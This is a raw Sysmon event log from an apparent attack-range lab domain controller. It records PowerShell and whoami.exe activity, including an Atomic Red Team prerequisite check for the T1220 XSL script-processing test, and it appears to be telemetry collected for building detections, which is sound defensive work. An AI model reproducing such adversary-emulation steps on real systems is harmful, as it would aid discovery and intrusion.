12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057346728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057346724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057346723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 734700x800000000000000057346722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057346720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.502{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.502{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057346717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.480{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.480{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2BBE) 154100x800000000000000057346715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.439{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000057346714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.149{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.149{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=67716390A61B3047A8918A259BCE8906,SHA256=7246F6ADC8DD6466D950A42A63C5F8913A44B64A7EFBD65729D0A387DCCFE1A8falsetrue 534500x800000000000000057346712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.118{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exe 734700x800000000000000057346711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057346710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\authz.dll10.0.14393.1737 (rs1_release_inmarket.170914-1249)Authorization FrameworkMicrosoft® Windows® Operating SystemMicrosoft Corporationauthz.dllMD5=6BAADF6A3E985DE5AB6FDA778E18F1A5,SHA256=8FD060B0F29A1FB23C3D1F389C22EC067247F1E457F331D2B15AE44323ECB8D0trueMicrosoft WindowsValid 734700x800000000000000057346706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057346705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057346704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057346703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057346700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057346691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.102{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.101{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.101{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.100{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057346687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.100{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\System32\whoami.exeC:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exeMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88AtrueMicrosoft WindowsValid 10341000x800000000000000057346686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.099{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057346685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.098{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BA2-618E-50F3-04000000F101}6824C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+30ef8c9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+2572d22(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257295d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303ac8b(